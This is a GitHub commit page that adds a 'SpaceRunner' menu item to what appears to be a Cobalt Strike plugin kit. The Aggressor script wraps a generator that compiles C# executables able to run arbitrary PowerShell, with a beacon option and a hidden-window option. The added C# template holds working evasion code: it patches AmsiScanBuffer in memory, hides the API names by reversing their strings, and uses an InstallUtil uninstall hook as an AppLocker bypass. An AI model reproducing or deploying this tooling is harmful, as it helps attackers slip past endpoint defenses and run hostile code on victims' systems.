-
Notifications
You must be signed in to change notification settings - Fork 215
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
51c0698
commit 1d8d5fe
Showing
10 changed files
with
211 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -26,5 +26,6 @@ hs_err_pid* | |
| UntilTest/* | ||
| logs/* | ||
| temp/* | ||
| bin/* | ||
| !.gitkeep | ||
| *.TMP | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| sub SpaceRunner{ | ||
| local('$_type $_generater $_isbeacon $_hide $_func $_args $_file'); | ||
| #$_type = $3['type']; | ||
| $_isbeacon = " -b "; | ||
| $_hide = " -h "; | ||
| $_func = " -f ".$3['func']; | ||
| $_args = " -a ".$3['args']; | ||
| $_generater = script_resource("post\\SpaceRunner\\spacerunner.exe"); | ||
| #TODO support remote file | ||
| #if($_type eq "Local"){ | ||
| $_file = $3['lfile']; | ||
| $cmd = $_generater." -i ".$_file." -o ".script_resource("bin\\server-".getFileName($_file).".exe"); | ||
| if($3['hide'] eq "true"){ | ||
| $cmd = $cmd.$_hide; | ||
| } | ||
| if($3['beacon'] eq "true"){ | ||
| $cmd = $cmd.$_isbeacon; | ||
| } | ||
| if($3['func'] ne ""){ | ||
| $cmd = $cmd.$_func; | ||
| } | ||
| if($3['args'] ne ""){ | ||
| $cmd = $cmd.$_args; | ||
| } | ||
| exec($cmd); | ||
| show_message("Save success: ".script_resource("bin\\server-".getFileName($_file).".exe")); | ||
| #} | ||
| } | ||
| item "SpaceRunner"{ | ||
| $Dialog = dialog("SpaceRunner",%(),&SpaceRunner); | ||
| dialog_description($Dialog, "This tool enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace. "); | ||
| #drow_combobox($Dialog, "type", "Generate type: ", @("Local","Remote")); | ||
| drow_file($Dialog, "lfile", "Local PS file: "); | ||
| #drow_text($Dialog, "rfile", "Remote PS file: "); | ||
| drow_text($Dialog, "func", "Function to call: "); | ||
| drow_text($Dialog, "args", "Function arguments to pass: "); | ||
| drow_checkbox($Dialog, "beacon", "Cobalt Strike beacon: ", ""); | ||
| drow_checkbox($Dialog, "hide", "Set window's hide state: ", ""); | ||
| dbutton_action($Dialog, "Generate"); | ||
| dialog_show($Dialog); | ||
| } |
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,151 @@ | ||
| using System; | ||
| using System.IO; | ||
| using System.Collections.Generic; | ||
| using System.Collections.ObjectModel; | ||
| using System.Text; | ||
| using System.Threading.Tasks; | ||
| using System.Management.Automation; | ||
| using System.Management.Automation.Host; | ||
| using System.Management.Automation.Runspaces; | ||
| using System.DirectoryServices; | ||
| using System.Security.Principal; | ||
| using System.Runtime.InteropServices; | ||
|
|
||
| /* | ||
| c:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:system.management.automation.dll /unsafe /platform:x64 /preferreduilang:en-US /filealign:512 /out:template.exe /target:exe template.cs | ||
| */ | ||
|
|
||
| namespace Application | ||
| { | ||
| [System.ComponentModel.RunInstaller(true)] | ||
| public class InstallUtil : System.Configuration.Install.Installer | ||
| { | ||
| // @subTee app locker bypass | ||
| public override void Install(System.Collections.IDictionary savedState) | ||
| { | ||
|
|
||
| } | ||
|
|
||
| public override void Uninstall(System.Collections.IDictionary savedState) | ||
| { | ||
| Program.Main(); | ||
| } | ||
| } | ||
|
|
||
| class Program | ||
| { | ||
| public static void Main() | ||
| { | ||
| const int SW_HIDE = 0; | ||
| const int SW_SHOW = 5; | ||
|
|
||
| var handle = Win32.GetConsoleWindow(); | ||
|
|
||
| // Show Window | ||
| Win32.ShowWindow(handle, SW_SHOW); | ||
|
|
||
| var amsi = new Amsi(); | ||
| amsi.Bypass(); | ||
| string commandArrayString = "FIXME_FUNCTIONS"; | ||
| List<string> commandArray = new List<string>(commandArrayString.Split(',')); | ||
| System.Management.Automation.Runspaces.Runspace runspace = System.Management.Automation.Runspaces.RunspaceFactory.CreateRunspace(); | ||
| runspace.Open(); | ||
|
|
||
| System.Management.Automation.Runspaces.Pipeline pipeline = runspace.CreatePipeline(); | ||
| pipeline.Commands.AddScript(ApplicationData.runApp()); | ||
| foreach (var command in commandArray) { | ||
| pipeline.Commands.AddScript(command); | ||
| } | ||
|
|
||
| runspace.SessionStateProxy.SetVariable("FormatEnumerationLimit", -1); | ||
| pipeline.Commands.Add("Out-String"); | ||
|
|
||
| System.Collections.ObjectModel.Collection<System.Management.Automation.PSObject> results = pipeline.Invoke(); | ||
| runspace.Close(); | ||
| System.Text.StringBuilder stringBuilder = new System.Text.StringBuilder(); | ||
| foreach (System.Management.Automation.PSObject obj in results) | ||
| { | ||
| stringBuilder.AppendLine(obj.ToString()); | ||
| } | ||
| System.Console.WriteLine(stringBuilder.ToString()); | ||
| } | ||
| } | ||
|
|
||
| class ApplicationData | ||
| { | ||
| public static string runApp() | ||
| { | ||
| return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"FIXME_BASE64")); | ||
| } | ||
| } | ||
|
|
||
| public class Amsi | ||
| { | ||
| // https://twitter.com/_xpn_/status/1170852932650262530 | ||
| static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; | ||
| static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; | ||
|
|
||
| public void Bypass() | ||
| { | ||
| if (is64Bit()) | ||
| PatchAmsi(x64); | ||
| else | ||
| PatchAmsi(x86); | ||
| } | ||
|
|
||
| private static void PatchAmsi(byte[] patch) | ||
| { | ||
| try | ||
| { | ||
|
|
||
| var lib = Win32.LoadLibrary(ReverseString("lld.isma")); | ||
| var addr = Win32.GetProcAddress(lib, ReverseString("reffuBnacSismA")); | ||
|
|
||
| uint oldProtect; | ||
| Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); | ||
|
|
||
| Marshal.Copy(patch, 0, addr, patch.Length); | ||
| } | ||
| catch (Exception e) | ||
| { | ||
| Console.WriteLine(" [x] {0}", e.Message); | ||
| Console.WriteLine(" [x] {0}", e.InnerException); | ||
| } | ||
| } | ||
|
|
||
| private static bool is64Bit() | ||
| { | ||
| bool is64Bit = true; | ||
|
|
||
| if (IntPtr.Size == 4) | ||
| is64Bit = false; | ||
|
|
||
| return is64Bit; | ||
| } | ||
|
|
||
| public static string ReverseString(string s) | ||
| { | ||
| char[] arr = s.ToCharArray(); | ||
| Array.Reverse(arr); | ||
| return new string(arr); | ||
| } | ||
| } | ||
|
|
||
| class Win32 | ||
| { | ||
| [DllImport("kernel32")] | ||
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | ||
|
|
||
| [DllImport("kernel32")] | ||
| public static extern IntPtr LoadLibrary(string name); | ||
|
|
||
| [DllImport("kernel32")] | ||
| public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | ||
|
|
||
| [DllImport("kernel32")] | ||
| public static extern IntPtr GetConsoleWindow(); | ||
|
|
||
| [DllImport("user32")] | ||
| public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,2 +1,2 @@ | ||
| ver = 1.3.3 | ||
| ver = 1.3.4 | ||
| dir = C:\Services\ |